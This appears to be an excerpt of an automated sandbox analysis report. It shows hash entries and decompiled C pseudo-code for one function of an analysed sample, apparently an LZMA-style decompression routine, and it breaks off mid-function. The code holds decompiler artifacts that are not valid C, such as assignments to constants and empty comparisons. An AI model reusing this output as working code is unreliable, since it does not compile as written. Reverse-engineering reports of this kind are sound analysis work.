                                                                                                                                                                                            • Instruction ID: 2fad1600ae036a48ee23fd139ce98b02b16f5688abb6f160f307e5ea8ce8c29c
                                                                                                                                                                                            • Opcode Fuzzy Hash: b7deee19aa505c7f9bc01a03303daab882d22c4ac73502a2d2277e442c3833e4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 70C080316041309BD3201B767D0CE477F54FF147B13024239F444E1210D6304C00C7E4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406C36 Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                            			E00406C36(void* __ecx) {
				signed int _t434;
				signed int _t435;
				unsigned int _t477;
				signed int _t480;
				signed int _t529;
				void* _t549;
				void* _t550;

				_t480 = 0x22;
				 *((intOrPtr*)(_t549 + 0xb8)) = __ecx;
				memcpy(_t549 + 0x18, __ecx, _t480 << 2);
				_t550 = _t549 + 0xc;
				if( *(_t550 + 0x70) != 0xffffffff) {
					_t529 =  *(_t550 + 0x94);
					 *(_t550 + 0xac) =  *(_t550 + 0x88);
					 *((intOrPtr*)(_t550 + 0xa8)) =  *((intOrPtr*)(_t550 + 0x84));
					 *(_t550 + 0xa4) =  *(_t550 + 0x54);
					_t477 =  *(_t550 + 0x94);
					 *((char*)(_t550 + 0x1b)) =  *((intOrPtr*)(_t550 + 0x45));
					_t434 =  *(_t550 + 0x20);
					 *((intOrPtr*)(_t550 + 0xb8)) = 9;
					 *((intOrPtr*)(_t550 + 0xbc)) = 8;
					 *((intOrPtr*)(_t550 + 0x14)) =  *((intOrPtr*)(_t550 + 0x74));
					 *(_t550 + 0x10) =  *(_t550 + 0x58);
					L3:
					while(_t434 <= 0x1c) {
						switch( *((intOrPtr*)(_t434 * 4 +  &M0040798E))) {
							case 0:
								_t436 =  *((intOrPtr*)(_t550 + 0x3c));
								if(_t436 == 0) {
									goto L176;
								}
								 *((intOrPtr*)(_t550 + 0x3c)) = _t436 - 1;
								_t439 =  *(_t550 + 0x38);
								_t485 =  *_t439;
								_t434 = _t439 + 1;
								 *(_t550 + 0x38) = _t434;
								if(_t485 > 0xe1) {
									goto L177;
								}
								_t440 = _t485 & 0x000000ff;
								_push(0x2d);
								_pop(_t486);
								_push(9);
								_t538 = _t440 / _t486;
								_t442 = _t440 % _t486 & 0x000000ff;
								_pop(_t487);
								 *(_t550 + 0x6c) = _t442 % _t487 & 0x000000ff;
								 *(_t550 + 0xb0) = 1;
								 *((intOrPtr*)(_t550 + 0x8c)) = (1 << _t538) - 1;
								 *((intOrPtr*)(_t550 + 0xb4)) = 1;
								 *((intOrPtr*)(_t550 + 0x90)) = (1 << _t442 / _t487) - 1;
								_t493 =  *(_t550 + 0xa4);
								_t541 = (0x300 <<  *(_t550 + 0x6c) + _t538) + 0x736;
								_t444 = 0x600;
								if(0x600 ==  *((intOrPtr*)(_t550 + 0x30))) {
									do {
										L12:
										_t541 = _t541 - 1;
										 *((short*)(_t493 + _t541 * 2)) = 0x400;
									} while (_t541 != 0);
									_t494 = 0;
									_t542 = 0;
									goto L16;
								}
								if(_t493 != 0) {
									GlobalFree(_t493);
									_t444 = 0x600;
								}
								_t434 = GlobalAlloc(0x40, _t444); // executed
								_t493 = _t434;
								 *(_t550 + 0xa4) = _t493;
								if(_t493 == 0) {
									goto L177;
								} else {
									 *((intOrPtr*)(_t550 + 0x30)) = _t541 + _t541;
									goto L12;
								}
							case 1:
								L14:
								_t446 =  *((intOrPtr*)(_t550 + 0x3c));
								if(_t446 == 0) {
									 *(_t550 + 0x20) = 1;
									goto L176;
								}
								_t519 =  *(_t550 + 0x38);
								 *((intOrPtr*)(_t550 + 0x3c)) = _t446 - 1;
								_t542 = _t542 | ( *_t519 & 0x000000ff) << _t494 << 0x00000003;
								_t494 =  *(_t550 + 0x10) + 1;
								 *(_t550 + 0x38) =  &(_t519[1]);
								L16:
								 *(_t550 + 0x60) = _t494;
								 *(_t550 + 0x10) = _t494;
								 *(_t550 + 0x68) = _t542;
								if(_t494 < 4) {
									goto L14;
								}
								_t450 =  *(_t550 + 0x34);
								if(_t542 == _t450) {
									L22:
									_push(5);
									 *((char*)( *(_t550 + 0xa0) + _t450 - 1)) = 0;
									_pop(_t498);
									goto L25;
								}
								_t470 =  *(_t550 + 0xa0);
								 *(_t550 + 0x34) = _t542;
								if(_t470 != 0) {
									GlobalFree(_t470);
								}
								_t434 = GlobalAlloc(0x40, _t542); // executed
								 *(_t550 + 0xa0) = _t434;
								if(_t434 == 0) {
									goto L177;
								} else {
									_t450 =  *(_t550 + 0x34);
									goto L22;
								}
							case 2:
								L26:
								_t500 =  *(_t550 + 0x48) &  *(_t550 + 0xb0);
								 *(_t550 + 0xac) = _t500;
								 *(_t550 + 0x5c) = _t500;
								 *(_t550 + 0x24) = 6;
								_t502 =  *(_t550 + 0xa4) + (( *(_t550 + 0x70) << 4) + _t500) * 2;
								 *(_t550 + 0x54) = _t502;
								goto L139;
							case 3:
								L23:
								_t452 =  *((intOrPtr*)(_t550 + 0x3c));
								if(_t452 == 0) {
									 *(_t550 + 0x20) = 3;
									goto L176;
								}
								_t521 =  *(_t550 + 0x38);
								 *((intOrPtr*)(_t550 + 0x3c)) = _t452 - 1;
								_t529 = _t529 << 0x00000008 |  *_t521 & 0x000000ff;
								 *(_t550 + 0x9c) = _t529;
								 *(_t550 + 0x38) =  &(_t521[1]);
								L25:
								_t451 = _t498;
								_t498 = _t498 - 1;
								 *(_t550 + 0x10) = _t498;
								 *(_t550 + 0x60) = _t498;
								if(_t451 != 0) {
									goto L23;
								}
								goto L26;
							case 4:
								__ecx =  *(__esp + 0x54);
								goto L139;
							case 5:
								L143:
								_t463 =  *((intOrPtr*)(_t550 + 0x3c));
								if(_t463 == 0) {
									 *(_t550 + 0x20) = 5;
									goto L176;
								}
								_t504 =  *(_t550 + 0x38);
								_t477 = _t477 << 8;
								 *((intOrPtr*)(_t550 + 0x3c)) = _t463 - 1;
								_t529 = _t529 << 0x00000008 |  *_t504 & 0x000000ff;
								 *(_t550 + 0x98) = _t477;
								 *(_t550 + 0x9c) = _t529;
								 *(_t550 + 0x38) =  &(_t504[1]);
								goto L145;
							case 6:
								if(__esi != 0) {
									__eax =  *(__esp + 0x70);
									__ecx =  *(__esp + 0xa4);
									 *(__esp + 0x74) = 1;
									_push(7);
									__ecx = __ecx + __eax * 2;
									__ecx = __ecx + 0x180;
									goto L40;
								}
								__edx =  *(__esp + 0x4c) & 0x000000ff;
								_push(8);
								_pop(__eax);
								__cl = __al;
								__eax =  *(__esp + 0x48);
								__cl = __al -  *(__esp + 0x6c);
								__eax =  *(__esp + 0x48) &  *(__esp + 0xb4);
								__edx = __edx >> __cl;
								__ecx =  *(__esp + 0x6c);
								__eax = ( *(__esp + 0x48) &  *(__esp + 0xb4)) << __cl;
								__ecx =  *(__esp + 0xa4);
								__edx = __edx + (( *(__esp + 0x48) &  *(__esp + 0xb4)) << __cl);
								__eax = __edx * 0x600;
								__ecx =  *(__esp + 0xa4) + 0xe6c;
								__eax = __edx * 0x600 +  *(__esp + 0xa4) + 0xe6c;
								 *(__esp + 0x50) = __edx * 0x600 +  *(__esp + 0xa4) + 0xe6c;
								__eax =  *(__esp + 0x70);
								if(__eax >= 4) {
									if(__eax >= 0xa) {
										__eax = __eax - 6;
									} else {
										__eax = __eax - 3;
									}
									 *(__esp + 0x70) = __eax;
								} else {
									 *(__esp + 0x70) =  *(__esp + 0x70) & __esi;
								}
								if( *(__esp + 0x74) == 0) {
									__ebp = 0;
									__ebp = 1;
									goto L63;
								} else {
									__eax =  *(__esp + 0x94);
									__eax =  *(__esp + 0x94) -  *(__esp + 0x14);
									__ecx =  *(__esp + 0x34);
									if(__eax >= __ecx) {
										__eax = __eax + __ecx;
									}
									__ecx =  *(__esp + 0xa0);
									__ebp = 0;
									__ebp = 1;
									__al =  *((intOrPtr*)(__eax +  *(__esp + 0xa0)));
									goto L46;
								}
							case 7:
								if(__esi != 1) {
									__eax =  *(__esp + 0x84);
									__ecx =  *(__esp + 0x80);
									 *(__esp + 0x88) =  *(__esp + 0x84);
									_push(0xa);
									_pop(__eax);
									_push(7);
									 *(__esp + 0x88) = __ecx;
									_pop(__ecx);
									 *(__esp + 0x80) = __edx;
									__eax =  <  ? __ecx : __eax;
									 *(__esp + 0x28) = 0x16;
									 *(__esp + 0x70) = __eax;
									__eax =  *(__esp + 0xa4);
									__eax =  *(__esp + 0xa4) + 0x664;
									 *(__esp + 0x50) = __eax;
									goto L133;
								}
								__eax =  *(__esp + 0x70);
								__ecx =  *(__esp + 0xa4);
								_push(8);
								__ecx = __ecx + __eax * 2;
								__ecx = __ecx + 0x198;
								goto L40;
							case 8:
								__eax =  *(__esp + 0x70);
								__ecx =  *(__esp + 0xa4);
								if(__esi != 0) {
									__ecx = __ecx + __eax * 2;
									 *(__esp + 0x24) = 0xa;
									__ecx = __ecx + 0x1b0;
									 *(__esp + 0x54) = __ecx;
									goto L139;
								}
								__eax = __eax + 0xf;
								__eax = __eax << 4;
								__eax = __eax +  *(__esp + 0xac);
								_push(9);
								__ecx = __ecx + __eax * 2;
								L40:
								_pop(__eax);
								 *(__esp + 0x54) = __ecx;
								 *(__esp + 0x24) = __eax;
								goto L139;
							case 9:
								if(__esi != 0) {
									goto L95;
								}
								if( *(__esp + 0x48) == __esi) {
									goto L177;
								}
								_push(0xb);
								_pop(__eax);
								 *(__esp + 0x70) = __eax;
								goto L81;
							case 0xa:
								if(__esi != 0) {
									__eax =  *(__esp + 0x70);
									__ecx =  *(__esp + 0xa4);
									 *(__esp + 0x24) = 0xb;
									__ecx =  *(__esp + 0xa4) +  *(__esp + 0x70) * 2;
									__ecx =  *(__esp + 0xa4) +  *(__esp + 0x70) * 2 + 0x1c8;
									 *(__esp + 0x54) = __ecx;
									goto L139;
								}
								__eax =  *(__esp + 0x80);
								goto L94;
							case 0xb:
								if(__esi != 0) {
									__eax =  *(__esp + 0x88);
									__ecx =  *(__esp + 0x84);
									 *(__esp + 0x88) =  *(__esp + 0x84);
								} else {
									__eax =  *(__esp + 0x84);
								}
								__ecx =  *(__esp + 0x80);
								 *(__esp + 0x84) =  *(__esp + 0x80);
								L94:
								__ecx = __eax;
								 *(__esp + 0x80) = __edx;
								 *(__esp + 0x14) = __ecx;
								 *(__esp + 0x7c) = __ecx;
								L95:
								__eax =  *(__esp + 0xa4);
								__eax =  *(__esp + 0xa4) + 0xa68;
								 *(__esp + 0x28) = 0x15;
								 *(__esp + 0x50) = __eax;
								goto L133;
							case 0xc:
								L103:
								__eax =  *(__esp + 0x3c);
								if(__eax == 0) {
									 *(__esp + 0x20) = 0xc;
									goto L176;
								}
								__edx =  *(__esp + 0x38);
								__ebx = __ebx << 8;
								 *(__esp + 0x3c) = __eax;
								__edi = __edi << 8;
								__eax =  *__edx & 0x000000ff;
								__edi = __edi |  *__edx & 0x000000ff;
								 *(__esp + 0x98) = __ebx;
								__edx = __edx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __edx;
								goto L105;
							case 0xd:
								L41:
								__edx =  *(__esp + 0x3c);
								if(__edx == 0) {
									 *(__esp + 0x20) = 0xd;
									goto L176;
								}
								__ebx = __ebx << 8;
								 *(__esp + 0x3c) = __edx;
								__edx =  *(__esp + 0x38);
								__edi = __edi << 8;
								 *(__esp + 0x98) = __ebx;
								__eax =  *__edx & 0x000000ff;
								__edi = __edi |  *__edx & 0x000000ff;
								__edx = __edx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __edx;
								L43:
								if(__ecx != __esi) {
									goto L53;
								}
								if(__ebp >= 0x100) {
									goto L59;
								}
								__al =  *(__esp + 0x1b);
								L46:
								__edx =  *(__esp + 0x50);
								__ecx = __al & 0x000000ff;
								__al = __al + __al;
								__ecx = __ecx >> 7;
								 *(__esp + 0x1b) = __al;
								 *(__esp + 0x4d) = __al;
								 *(__esp + 0x10) = __ecx;
								__eax = __ecx + 1;
								 *(__esp + 0x60) = __ecx;
								__ecx + 1 << 8 = (__ecx + 1 << 8) + __ebp;
								__edx =  *(__esp + 0x50) + ((__ecx + 1 << 8) + __ebp) * 2;
								__eax =  *__edx & 0x0000ffff;
								__esi = __ax & 0x0000ffff;
								 *(__esp + 0x1c) =  *__edx & 0x0000ffff;
								__ebx = __ebx >> 0xb;
								__eax = (__ebx >> 0xb) * __esi;
								 *(__esp + 0xa8) = __esi;
								__esi = 0;
								 *(__esp + 0x54) = __edx;
								if(__edi >= __eax) {
									__edi = __edi - __eax;
									__ebp = 1 + __ebp * 2;
									__ebx = __ebx - __eax;
									 *(__esp + 0x9c) = __edi;
									__ax =  *(__esp + 0x1c);
									__esi = 1;
									__ax =  *(__esp + 0x1c) >> 5;
									 *(__esp + 0x1c) =  *(__esp + 0x1c) - __ax;
									__eax =  *(__esp + 0x1c);
								} else {
									__ebx = __eax;
									0x800 = 0x800 -  *(__esp + 0xa8);
									0x800 -  *(__esp + 0xa8) >> 5 = (0x800 -  *(__esp + 0xa8) >> 5) +  *(__esp + 0x1c);
									__ebp = __ebp + __ebp;
								}
								 *(__esp + 0x64) = __ebp;
								 *__edx = __ax;
								 *(__esp + 0x98) = __ebx;
								 *(__esp + 0x68) = __esi;
								if(__ebx >= 0x1000000) {
									goto L43;
								} else {
									goto L41;
								}
							case 0xe:
								L51:
								__edx =  *(__esp + 0x3c);
								if(__edx == 0) {
									 *(__esp + 0x20) = 0xe;
									goto L176;
								}
								__ecx =  *(__esp + 0x38);
								__ebx = __ebx << 8;
								__edx = __edx - 1;
								__edi = __edi << 8;
								 *(__esp + 0x98) = __ebx;
								__eax =  *__ecx & 0x000000ff;
								__edi = __edi |  *__ecx & 0x000000ff;
								 *(__esp + 0x3c) = __edx;
								__ecx = __ecx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __ecx;
								L53:
								while(__ebp < 0x100) {
									__edx =  *(__esp + 0x50);
									__eax = __ebp * 2;
									__edx =  *(__esp + 0x50) + __eax;
									 *(__esp + 0xa8) = __eax;
									__ecx = __ebx;
									 *(__esp + 0x54) = __edx;
									__ecx = __ebx >> 0xb;
									__eax =  *__edx & 0x0000ffff;
									__ecx = (__ebx >> 0xb) * ( *__edx & 0x0000ffff);
									if(__edi >= __ecx) {
										__ebp =  *(__esp + 0xa8);
										__edi = __edi - __ecx;
										__ebx = __ebx - __ecx;
										 *(__esp + 0x9c) = __edi;
										__ecx =  *__edx & 0x0000ffff;
										__ax = __cx;
										__ax = __cx >> 5;
										__cx = __cx - __ax;
										__ebp =  *(__esp + 0xa8) + 1;
									} else {
										__edx =  *__edx & 0x0000ffff;
										__ebx = __ecx;
										__eax = __edx;
										0x800 = 0x800 - __edx;
										0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __edx;
										__edx =  *(__esp + 0x54);
										__ebp = __ebp + __ebp;
									}
									 *(__esp + 0x64) = __ebp;
									 *__edx = __cx;
									 *(__esp + 0x98) = __ebx;
									if(__ebx >= 0x1000000) {
										continue;
									} else {
										goto L51;
									}
								}
								L59:
								__al =  *(__esp + 0x64);
								 *(__esp + 0x74) =  *(__esp + 0x74) & 0x00000000;
								 *(__esp + 0x4c) = __al;
								goto L70;
							case 0xf:
								L60:
								__eax =  *(__esp + 0x3c);
								if(__eax == 0) {
									 *(__esp + 0x20) = 0xf;
									goto L176;
								}
								__ecx =  *(__esp + 0x38);
								__ebx = __ebx << 8;
								 *(__esp + 0x3c) = __eax;
								__edi = __edi << 8;
								__eax =  *__ecx & 0x000000ff;
								__edi = __edi |  *__ecx & 0x000000ff;
								 *(__esp + 0x98) = __ebx;
								__ecx = __ecx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __ecx;
								L62:
								if(__ebp >= 0x100) {
									__al =  *(__esp + 0x64);
									 *(__esp + 0x4c) = __al;
									goto L70;
								}
								L63:
								__edx =  *(__esp + 0x50);
								__eax = __ebp * 2;
								__edx =  *(__esp + 0x50) + __eax;
								 *(__esp + 0xa8) = __eax;
								__ecx = __ebx;
								 *(__esp + 0x54) = __edx;
								__ecx = __ebx >> 0xb;
								__eax =  *__edx & 0x0000ffff;
								__ecx = (__ebx >> 0xb) * ( *__edx & 0x0000ffff);
								if(__edi >= __ecx) {
									__ebp =  *(__esp + 0xa8);
									__edi = __edi - __ecx;
									__ebx = __ebx - __ecx;
									 *(__esp + 0x9c) = __edi;
									__ecx =  *__edx & 0x0000ffff;
									__ax = __cx;
									__ax = __cx >> 5;
									__cx = __cx - __ax;
									__ebp =  *(__esp + 0xa8) + 1;
								} else {
									__edx =  *__edx & 0x0000ffff;
									__ebx = __ecx;
									__eax = __edx;
									0x800 = 0x800 - __edx;
									0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __edx;
									__edx =  *(__esp + 0x54);
									__ebp = __ebp + __ebp;
								}
								 *(__esp + 0x64) = __ebp;
								 *__edx = __cx;
								 *(__esp + 0x98) = __ebx;
								if(__ebx >= 0x1000000) {
									goto L62;
								} else {
									goto L60;
								}
							case 0x10:
								L113:
								__eax =  *(__esp + 0x3c);
								if(__eax == 0) {
									 *(__esp + 0x20) = 0x10;
									goto L176;
								}
								__edx =  *(__esp + 0x38);
								__ebx = __ebx << 8;
								 *(__esp + 0x3c) = __eax;
								__edi = __edi << 8;
								__eax =  *__edx & 0x000000ff;
								__edi = __edi |  *__edx & 0x000000ff;
								 *(__esp + 0x98) = __ebx;
								__edx = __edx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __edx;
								goto L115;
							case 0x11:
								__eax =  *(__esp + 0x50);
								L133:
								__ecx = __eax;
								 *(__esp + 0x24) = 0x12;
								 *(__esp + 0x54) = __ecx;
								goto L139;
							case 0x12:
								if(__esi != 0) {
									__ecx =  *(__esp + 0x50);
									__ecx =  *(__esp + 0x50) + 2;
									 *(__esp + 0x24) = 0x13;
									 *(__esp + 0x54) = __ecx;
									L139:
									_t523 =  *_t502 & 0x0000ffff;
									_t543 = _t523;
									_t460 = (_t477 >> 0xb) * _t543;
									if(_t529 >= _t460) {
										_t529 = _t529 - _t460;
										_t477 = _t477 - _t460;
										 *(_t550 + 0x9c) = _t529;
										_t545 = 1;
										 *_t502 = _t523 - (_t523 >> 5);
									} else {
										_t477 = _t460;
										_t545 = 0;
										 *_t502 = (0x800 - _t543 >> 5) + _t523;
									}
									 *(_t550 + 0x68) = _t545;
									 *(_t550 + 0x98) = _t477;
									if(_t477 >= 0x1000000) {
										L145:
										_t434 =  *(_t550 + 0x24);
										goto L85;
									} else {
										goto L143;
									}
								}
								__eax =  *(__esp + 0xac);
								__edx =  *(__esp + 0x50);
								 *(__esp + 0x78) =  *(__esp + 0x78) & __esi;
								__eax =  *(__esp + 0xac) << 4;
								__edx =  *(__esp + 0x50) + 4;
								goto L136;
							case 0x13:
								if(__esi != 0) {
									 *(__esp + 0x50) =  *(__esp + 0x50) + 0x204;
									_push(0x10);
									_pop(__eax);
									_push(8);
									 *(__esp + 0x7c) = __eax;
									_pop(__eax);
									__esi = __eax;
									L149:
									 *(__esp + 0x2c) = 0x14;
									goto L150;
								}
								__edx =  *(__esp + 0x50);
								_push(8);
								_pop(__eax);
								 *(__esp + 0x78) = __eax;
								__eax =  *(__esp + 0xac);
								__eax =  *(__esp + 0xac) << 4;
								__edx = __edx + 0x104;
								L136:
								__edx = __edx + __eax;
								_push(3);
								 *(__esp + 0x54) = __edx;
								_pop(__esi);
								goto L149;
							case 0x14:
								__eax =  *(__esp + 0x28);
								 *(__esp + 0x78) =  *(__esp + 0x78) + __ebp;
								 *(__esp + 0x20) =  *(__esp + 0x28);
								goto L3;
							case 0x15:
								_push(0xb);
								_pop(__eax);
								 *(__esp + 0x70) = __eax;
								goto L124;
							case 0x16:
								__ecx =  *(__esp + 0xa4);
								_push(3);
								_pop(__eax);
								__eax =  <  ?  *(__esp + 0x78) : __eax;
								__ecx = __ecx + 0x360;
								__eax = __eax << 7;
								__eax = __eax + __ecx;
								 *(__esp + 0x2c) = 0x19;
								_push(6);
								 *(__esp + 0x54) = __eax;
								_pop(__esi);
								L150:
								 *(__esp + 0x68) = __esi;
								goto L151;
							case 0x17:
								L151:
								__edx = 0;
								__ecx = __esi;
								__edx = 1;
								 *(__esp + 0x58) = 1;
								goto L155;
							case 0x18:
								L152:
								__eax =  *(__esp + 0x3c);
								if(__eax == 0) {
									 *(__esp + 0x20) = 0x18;
									goto L176;
								}
								__edx =  *(__esp + 0x38);
								__ebx = __ebx << 8;
								 *(__esp + 0x3c) = __eax;
								__edi = __edi << 8;
								__eax =  *__edx & 0x000000ff;
								__edi = __edi |  *__edx & 0x000000ff;
								 *(__esp + 0x98) = __ebx;
								__edx = __edx + 1;
								 *(__esp + 0x9c) = __edi;
								 *(__esp + 0x38) = __edx;
								L154:
								__edx =  *(__esp + 0x58);
								__ecx = __ecx - 1;
								L155:
								 *(__esp + 0x60) = __ecx;
								 *(__esp + 0x10) = __ecx;
								if(__ecx <= 0) {
									__eax = 0;
									__ecx = __esi;
									__eax = 1;
									__ebp = __edx;
									__eax = 1 << __cl;
									__ebp = __edx - (1 << __cl);
									__eax =  *(__esp + 0x2c);
									 *(__esp + 0x64) = __ebp;
									goto L85;
								}
								__ebp =  *(__esp + 0x50);
								__edx = __edx + __edx;
								__ebp =  *(__esp + 0x50) + __edx;
								__ebx = __ebx >> 0xb;
								 *(__esp + 0x54) = __ebp;
								__eax =  *__ebp & 0x0000ffff;
								__ecx = (__ebx >> 0xb) * ( *__ebp & 0x0000ffff);
								if(__edi >= __ecx) {
									__edi = __edi - __ecx;
									__ebx = __ebx - __ecx;
									__ecx =  *__ebp & 0x0000ffff;
									__ax = __cx;
									 *(__esp + 0x9c) = __edi;
									__ax = __cx >> 5;
									__cx = __cx - __ax;
									_t401 = __edx + 1; // 0x2
									__eax = _t401;
									 *(__esp + 0x58) = _t401;
								} else {
									__edx =  *__ebp & 0x0000ffff;
									__ebx = __ecx;
									__eax = __edx;
									0x800 = 0x800 - __edx;
									0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __edx;
									 *(__esp + 0x58) =  *(__esp + 0x58) << 1;
								}
								 *__ebp = __cx;
								__ecx =  *(__esp + 0x10);
								 *(__esp + 0x98) = __ebx;
								if(__ebx >= 0x1000000) {
									goto L154;
								} else {
									goto L152;
								}
							case 0x19:
								if(__ebp < 4) {
									__edx = __ebp;
									L123:
									__edx = __edx + 1;
									 *(__esp + 0x14) = __edx;
									 *(__esp + 0x7c) = __edx;
									L124:
									if(__edx == 0) {
										 *(__esp + 0x78) =  *(__esp + 0x78) | 0xffffffff;
										goto L176;
									}
									if(__edx >  *(__esp + 0x48)) {
										goto L177;
									}
									__eax =  *(__esp + 0x78);
									__eax =  *(__esp + 0x78) + 2;
									 *(__esp + 0x48) =  *(__esp + 0x48) + __eax;
									 *(__esp + 0x78) = __eax;
									goto L127;
								}
								__esi = __ebp;
								__eax = __ebp;
								__esi = __ebp >> 1;
								__eax = __ebp & 0x00000001;
								__esi = (__ebp >> 1) - 1;
								__eax = __ebp & 0x00000001 | 0x00000002;
								__ecx = __esi;
								__eax = (__ebp & 0x00000001 | 0x00000002) << __cl;
								 *(__esp + 0x14) = __eax;
								 *(__esp + 0x7c) = __eax;
								if(__ebp >= 0xe) {
									__ebp = 0;
									__ecx = __esi - 4;
									L106:
									 *(__esp + 0x60) = __ecx;
									if(__ecx <= 0) {
										__ecx =  *(__esp + 0x14);
										__eax =  *(__esp + 0xa4);
										__ecx =  *(__esp + 0x14) + __ebp;
										__eax =  *(__esp + 0xa4) + 0x644;
										_push(4);
										 *(__esp + 0x18) = __ecx;
										 *(__esp + 0x80) = __ecx;
										_pop(__esi);
										L112:
										 *(__esp + 0x50) = __eax;
										__ebp = 0;
										__eax = 0;
										 *(__esp + 0x68) = __esi;
										__eax = 1;
										 *(__esp + 0x64) = 0;
										 *(__esp + 0x58) = 1;
										__ecx = 0;
										L116:
										 *(__esp + 0x60) = __ecx;
										 *(__esp + 0x10) = __ecx;
										if(__ecx >= __esi) {
											__edx =  *(__esp + 0x14);
											__edx =  *(__esp + 0x14) + __ebp;
											goto L123;
										}
										__edx =  *(__esp + 0x50);
										__eax = __eax + __eax;
										__edx =  *(__esp + 0x50) + __eax;
										 *(__esp + 0xa8) = __eax;
										__eax = __ebx;
										 *(__esp + 0x54) = __edx;
										__eax = __ebx >> 0xb;
										 *(__esp + 0x1c) = __ebx >> 0xb;
										__eax =  *__edx & 0x0000ffff;
										__edx =  *(__esp + 0x1c);
										__edx =  *(__esp + 0x1c) * __eax;
										__eax = __edx;
										 *(__esp + 0x1c) = __edx;
										__edx =  *(__esp + 0x54);
										if(__edi >= __eax) {
											asm("bts ebp, ecx");
											__edi = __edi - __eax;
											__ecx =  *__edx & 0x0000ffff;
											__ebx = __ebx - __eax;
											__ax = __cx;
											 *(__esp + 0x64) = __ebp;
											__ax = __cx >> 5;
											__cx = __cx - __ax;
											 *(__esp + 0x9c) = __edi;
											 *(__esp + 0xa8) =  *(__esp + 0xa8) + 1;
											 *(__esp + 0x58) =  *(__esp + 0xa8) + 1;
										} else {
											__edx =  *__edx & 0x0000ffff;
											__ebx = __eax;
											__eax = __edx;
											0x800 = 0x800 - __edx;
											0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __edx;
											__edx =  *(__esp + 0x54);
											 *(__esp + 0x58) =  *(__esp + 0x58) << 1;
										}
										 *__edx = __cx;
										__ecx =  *(__esp + 0x10);
										 *(__esp + 0x98) = __ebx;
										if(__ebx >= 0x1000000) {
											L115:
											__eax =  *(__esp + 0x58);
											__ecx = __ecx + 1;
											goto L116;
										} else {
											goto L113;
										}
									}
									__ebx = __ebx >> 1;
									__ebp = __ebp + __ebp;
									 *(__esp + 0x98) = __ebx;
									 *(__esp + 0x64) = __ebp;
									if(__edi >= __ebx) {
										__edi = __edi - __ebx;
										__ebp = __ebp | 0x00000001;
										 *(__esp + 0x9c) = __edi;
										 *(__esp + 0x64) = __ebp;
									}
									if(__ebx >= 0x1000000) {
										L105:
										__ecx = __ecx - 1;
										goto L106;
									} else {
										goto L103;
									}
								}
								__ecx =  *(__esp + 0xa4);
								__eax = __eax - __ebp;
								__ecx =  *(__esp + 0xa4) + 0x55e;
								__eax =  *(__esp + 0xa4) + 0x55e + __eax * 2;
								goto L112;
							case 0x1a:
								__al =  *(__esp + 0x4c);
								L70:
								__edx =  *(__esp + 0x44);
								if(__edx == 0) {
									 *(__esp + 0x20) = 0x1a;
									goto L176;
								}
								__ecx =  *(__esp + 0x40);
								 *(__esp + 0x48) =  *(__esp + 0x48) + 1;
								 *__ecx = __al;
								__ecx = __ecx + 1;
								__edx = __edx - 1;
								 *(__esp + 0x40) = __ecx;
								__ecx =  *(__esp + 0x94);
								 *(__esp + 0x44) = __edx;
								__edx =  *(__esp + 0xa0);
								 *(__ecx +  *(__esp + 0xa0)) = __al;
								__eax = __ecx;
								__eax = __ecx + 1;
								__ecx =  *(__esp + 0x10);
								__edx = 0;
								_t190 = __eax %  *(__esp + 0x34);
								__eax = __eax /  *(__esp + 0x34);
								__edx = _t190;
								 *(__esp + 0x94) = __edx;
								goto L131;
							case 0x1b:
								L81:
								if( *(__esp + 0x44) == 0) {
									 *(__esp + 0x20) = 0x1b;
									goto L176;
								}
								__eax =  *(__esp + 0x94);
								__eax =  *(__esp + 0x94) - __edx;
								__edx =  *(__esp + 0x34);
								if(__eax >= __edx) {
									__eax = __eax + __edx;
								}
								__edx =  *(__esp + 0xa0);
								__ecx =  *(__esp + 0x94);
								_push(2);
								__al =  *(__eax + __edx);
								 *(__ecx + __edx) = __al;
								__edx = 0;
								 *(__esp + 0x50) = __al;
								__eax = __ecx;
								__eax = __ecx + 1;
								__ecx =  *(__esp + 0x44);
								_t233 = __eax %  *(__esp + 0x38);
								__eax = __eax /  *(__esp + 0x38);
								__edx = _t233;
								__al =  *(__esp + 0x50);
								 *(__esp + 0x4c) =  *(__esp + 0x4c) + 1;
								 *__ecx = __al;
								__ecx = __ecx + 1;
								 *(__esp + 0x48) =  *(__esp + 0x48) - 1;
								 *(__esp + 0x98) = __edx;
								 *(__esp + 0x44) = __ecx;
								_pop(__eax);
								L85:
								goto L86;
							case 0x1c:
								L127:
								while( *(__esp + 0x44) != 0) {
									__eax =  *(__esp + 0x94);
									__eax =  *(__esp + 0x94) - __edx;
									__edx =  *(__esp + 0x34);
									if(__eax >= __edx) {
										__eax = __eax + __edx;
									}
									__edx =  *(__esp + 0xa0);
									__ecx =  *(__esp + 0x94);
									__al =  *(__eax + __edx);
									 *(__ecx + __edx) = __al;
									__edx = 0;
									 *(__esp + 0x4c) = __al;
									__eax = __ecx;
									__eax = __ecx + 1;
									__ecx =  *(__esp + 0x40);
									_t343 = __eax %  *(__esp + 0x34);
									__eax = __eax /  *(__esp + 0x34);
									__edx = _t343;
									__al =  *(__esp + 0x4c);
									 *__ecx = __al;
									__ecx = __ecx + 1;
									__eax =  *(__esp + 0x78);
									 *(__esp + 0x44) =  *(__esp + 0x44) - 1;
									__eax =  *(__esp + 0x78) - 1;
									 *(__esp + 0x94) = _t343;
									__edx =  *(__esp + 0x14);
									 *(__esp + 0x40) = __ecx;
									__ecx =  *(__esp + 0x10);
									 *(__esp + 0x78) = __eax;
									if(__eax > 0) {
										continue;
									} else {
										L131:
										_push(2);
										_pop(__eax);
										L86:
										 *(_t550 + 0x20) = _t434;
										goto L3;
									}
								}
								 *(__esp + 0x20) = 0x1c;
								L176:
								_push(0x22);
								_pop(_t483);
